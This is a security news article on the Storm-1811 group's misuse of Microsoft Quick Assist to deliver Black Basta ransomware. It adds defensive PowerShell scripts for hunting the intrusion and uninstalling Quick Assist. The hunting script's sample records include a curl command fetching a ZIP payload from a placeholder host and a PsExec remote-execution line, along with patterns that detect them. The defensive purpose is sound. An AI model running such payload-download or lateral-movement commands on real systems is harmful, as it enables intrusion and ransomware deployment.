Microsoft Quick Assist Exploited in Ransomware Attacks by Storm-1811

The Microsoft Threat Intelligence team has identified a cybercriminal group tracked as Storm-1811 abusing Microsoft’s Quick Assist feature in social engineering attacks to deploy ransomware. No vulnerability in Quick Assist is involved; the tool works as designed, and the victim is talked into granting the access. In a report published on May 15, 2024, Microsoft detailed how this financially motivated group uses Quick Assist to reach its targets, ultimately delivering Black Basta ransomware.

Storm-1811 opens its attacks by impersonating a trusted contact, such as Microsoft technical support or an IT professional from the victim’s own company, over a voice phishing call. The caller talks the victim into accepting a Quick Assist session; once inside, the actor installs remote monitoring and management (RMM) tools, which persist after the Quick Assist session ends, and uses them to deliver QakBot, Cobalt Strike, and finally Black Basta ransomware.

Quick Assist, a legitimate Microsoft application, allows users to share their Windows or macOS devices over a remote connection for troubleshooting purposes. This tool, pre-installed on Windows 11 devices, is being misused by attackers who pretend to offer technical support to gain initial access.

To make the ruse credible, the attackers first carry out what Microsoft calls a link listing attack: they sign the target’s address up to large numbers of newsletters and subscription services, flooding the inbox and creating a sense of urgency. They then call the victim posing as the company’s IT support team, offer to fix the spam problem, and convince the victim to grant remote access via Quick Assist.

Once the victim has granted control, the attacker, now working on the victim’s desktop, runs a scripted cURL command to download batch files or ZIP archives that deliver the malicious payloads. That foothold leads to hands-on-keyboard activity such as domain enumeration and lateral movement across the network, after which Storm-1811 uses PsExec to push Black Basta ransomware to other hosts.
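One way to hunt for the sequence just described, as an added example that is not code from the Microsoft report: a PowerShell function that takes process-creation records shaped like Sysmon Event ID 1 and flags curl.exe fetching .bat/.cmd/.zip files or PsExec appearing on a host shortly after QuickAssist.exe started there. The field names, the 120-minute window and the sample records at the bottom are all assumptions constructed for the example.

```powershell
# Added example; not code from the Microsoft report. Hunt for the post-access pattern described
# above: QuickAssist.exe starts on a host, and within the same window curl.exe pulls .bat/.zip
# files or PsExec shows up. Records mirror Sysmon Event ID 1 (process creation) fields; the sample
# records at the bottom are constructed, not real telemetry.

function Find-QuickAssistAbuse {
    param(
        [Parameter(Mandatory)] [object[]] $Events,  # objects with Computer, Time, Image, ParentImage, CommandLine
        [int] $WindowMinutes = 120                  # assumed follow-on window after Quick Assist starts
    )
    $hits = @()
    foreach ($group in ($Events | Group-Object -Property Computer)) {
        $sessionStart = $null
        foreach ($e in ($group.Group | Sort-Object -Property Time)) {
            # Quick Assist itself is legitimate software; just remember when a session began.
            if ($e.Image -match '\\QuickAssist\.exe$') { $sessionStart = $e.Time; continue }
            if ($null -eq $sessionStart) { continue }
            if (($e.Time - $sessionStart).TotalMinutes -gt $WindowMinutes) { continue }

            # Quick Assist injects the helper's keystrokes into the victim's desktop, so what the
            # attacker launches is a child of the shell they open (cmd.exe, powershell.exe), not of
            # QuickAssist.exe. Correlate by host and time rather than by parent process.
            $curlPayload = ($e.Image -match '\\curl\.exe$') -and
                           ($e.CommandLine -match '(?i)\.(bat|cmd|zip)(["\s]|$)')
            $psexec      = $e.Image -match '\\(psexec|psexec64|psexesvc)\.exe$'
            if (-not ($curlPayload -or $psexec)) { continue }

            $reason = if ($curlPayload) { 'curl.exe fetching bat/zip after Quick Assist session' } else { 'PsExec after Quick Assist session' }
            $hits += [pscustomobject]@{
                Computer    = $group.Name
                Time        = $e.Time
                Image       = $e.Image
                ParentImage = $e.ParentImage
                CommandLine = $e.CommandLine
                Reason      = $reason
            }
        }
    }
    return $hits
}

# Constructed sample: WS01 shows the full pattern, WS02 is a benign curl call with no Quick Assist session.
$t = [datetime]'2024-04-20T10:00:00'
$sample = @(
    [pscustomobject]@{ Computer='WS01'; Time=$t;                Image='C:\Windows\System32\quickassist.exe'; ParentImage='C:\Windows\explorer.exe';   CommandLine='quickassist.exe' }
    [pscustomobject]@{ Computer='WS01'; Time=$t.AddMinutes(12); Image='C:\Windows\System32\curl.exe';        ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='curl -o C:\Users\Public\update.zip http://example.invalid/update.zip' }
    [pscustomobject]@{ Computer='WS01'; Time=$t.AddMinutes(40); Image='C:\Tools\PsExec.exe';                 ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='PsExec.exe \\FS01 -s cmd /c C:\Users\Public\run.bat' }
    [pscustomobject]@{ Computer='WS02'; Time=$t.AddMinutes(5);  Image='C:\Windows\System32\curl.exe';        ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='curl https://example.invalid/api/health' }
)

Find-QuickAssistAbuse -Events $sample | Format-Table Computer, Time, Reason, CommandLine -AutoSize

# Against a real host, build the same records from Sysmon (Event ID 1) with Get-WinEvent, e.g.
# Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]'
# and read Image, ParentImage, CommandLine and UtcTime from each event's EventData.
```

The design choice worth noting is the host-and-time correlation: because Quick Assist drives the victim’s own desktop, the attacker’s commands are children of cmd.exe or explorer.exe, and a parent-process rule keyed on QuickAssist.exe would miss them. Tune the window and the file-extension list to your environment; legitimate help-desk sessions that use curl will need an allowlist.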

Microsoft is closely monitoring the misuse of Quick Assist and is working on adding warning messages to the software to alert users about potential tech support scams. The campaign, which began in mid-April 2024, targets various industries including manufacturing, construction, food and beverage, and transportation, indicating its opportunistic nature.

The low entry barrier for conducting these attacks, combined with their significant impact, makes ransomware a lucrative method for cybercriminals. Black Basta is described by Microsoft as a “closed ransomware offering,” not operating as a ransomware-as-a-service (RaaS). Instead, it involves a small group of threat actors who rely on others for initial access and infrastructure.

Since its first appearance in April 2022, Black Basta has been deployed following initial access from QakBot and other malware distributors. This highlights the importance of focusing on the early stages of an attack to mitigate the threat of ransomware deployment.

Microsoft recommends blocking or uninstalling Quick Assist, and any other remote monitoring and management tools, wherever they are not actively used, and training users to refuse unsolicited “support” calls, including ones that conveniently arrive in the middle of an inbox flood. Be precise about what multi-factor authentication (MFA) does here: the victim is already signed in when they grant Quick Assist access, so MFA cannot stop the initial foothold, but phishing-resistant MFA and credential hygiene still raise the cost of the credential-based lateral movement that follows. Up-to-date antivirus and endpoint protection can block the downloaded batch and ZIP payloads and the tooling deployed afterwards, and process telemetry from any host that hosted a support session should be checked for curl.exe downloads and PsExec activity.
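The uninstall step above, as an added example that is not code from the Microsoft report: Quick Assist can be present as a Store (Appx) package, as a provisioned package that is re-added to every new user profile, and on older builds as a Windows capability. The script below audits all three and removes whatever it finds; the function names are this example’s own, and it must run in an elevated PowerShell session.

```powershell
# Added example; not code from the Microsoft report. Audit every form in which Quick Assist can be
# present on a Windows host and, with Remove-QuickAssist, uninstall it. Run elevated. Package and
# capability names are looked up rather than hard-coded so version suffixes do not matter.

function Get-QuickAssistInstallState {
    # Current builds ship Quick Assist as a Store (MSIX/Appx) package ...
    $appx = @(Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue)
    # ... plus a provisioned copy that is installed again for each new user profile.
    $prov = @(Get-AppxProvisionedPackage -Online |
              Where-Object { $_.DisplayName -eq 'MicrosoftCorporationII.QuickAssist' })
    # Older builds carry it as a Windows capability (Features on Demand) instead.
    $cap  = @(Get-WindowsCapability -Online |
              Where-Object { $_.Name -like 'App.Support.QuickAssist*' -and $_.State -eq 'Installed' })
    [pscustomobject]@{
        AppxPackages        = $appx
        ProvisionedPackages = $prov
        Capabilities        = $cap
        Present             = ($appx.Count + $prov.Count + $cap.Count) -gt 0
    }
}

function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $state = Get-QuickAssistInstallState
    if (-not $state.Present) { Write-Verbose 'Quick Assist is not installed.'; return }

    foreach ($p in $state.AppxPackages) {
        if ($PSCmdlet.ShouldProcess($p.PackageFullName, 'Remove-AppxPackage -AllUsers')) {
            Remove-AppxPackage -Package $p.PackageFullName -AllUsers
        }
    }
    foreach ($p in $state.ProvisionedPackages) {
        if ($PSCmdlet.ShouldProcess($p.PackageName, 'Remove-AppxProvisionedPackage')) {
            Remove-AppxProvisionedPackage -Online -PackageName $p.PackageName | Out-Null
        }
    }
    foreach ($c in $state.Capabilities) {
        if ($PSCmdlet.ShouldProcess($c.Name, 'Remove-WindowsCapability')) {
            Remove-WindowsCapability -Online -Name $c.Name | Out-Null
        }
    }
}

# Dry run first (prints what would be removed), then remove, then re-audit.
Remove-QuickAssist -WhatIf
Remove-QuickAssist
Get-QuickAssistInstallState | Format-List
```

Uninstalling is not the whole control: a user can reinstall Quick Assist from the Microsoft Store unless Store access is restricted by policy or the package family is blocked with AppLocker or WDAC, so pair the removal with one of those and re-run the audit periodically.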